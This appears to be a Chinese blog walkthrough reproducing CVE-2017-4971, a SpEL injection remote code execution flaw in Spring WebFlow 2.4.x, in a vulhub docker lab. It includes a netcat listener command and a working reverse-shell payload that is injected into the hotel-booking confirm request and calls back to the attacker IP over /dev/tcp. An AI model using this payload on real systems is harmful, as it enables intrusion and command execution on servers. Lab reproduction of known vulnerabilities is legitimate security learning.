CVE-2017-4971 Spring WebFlow 远程代码执行漏洞

原理

Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的field,将导致一个SpEL表达式注入漏洞,最终造成任意命令执行。

影响版本

Spring WebFlow 2.4.0 - 2.4.4

漏洞复现

靶机Ubuntu:192.168.126.190

攻击机kali:192.168.126.129

启动docker环境

docker-compose up -d

访问页面【靶机IP+8080端口】

http://192.168.126.190:8080

可以看到一个酒店预订的页面

点击login,出现一些可用的账号密码,随意选择一组登录

登陆后,在输入框输入1,然后点击Find Hotels按钮

点击第一个View Hotel按钮,进入页面【也可以登录之后直接进入下面这个页面】

http://192.168.126.190:8080/hotels/1

点击预订按钮Book Hotel,填写相关信息后点击Proceed

打开BP,点击确认Confirm按钮时,抓包

抓到一个post数据包

在kali打开监听端口

nc -lvvp 6666

构造反弹shell的payload,放在请求包中【直接粘贴在原有数据后;改为靶机IP+监听端口】

&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/192.168.126.129/6666+0>%261")).start()=vulhub

点击send放包

成功反弹shell,执行任意命令测试

whoami

复现完成

在靶机关闭docker容器

docker-compose down

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值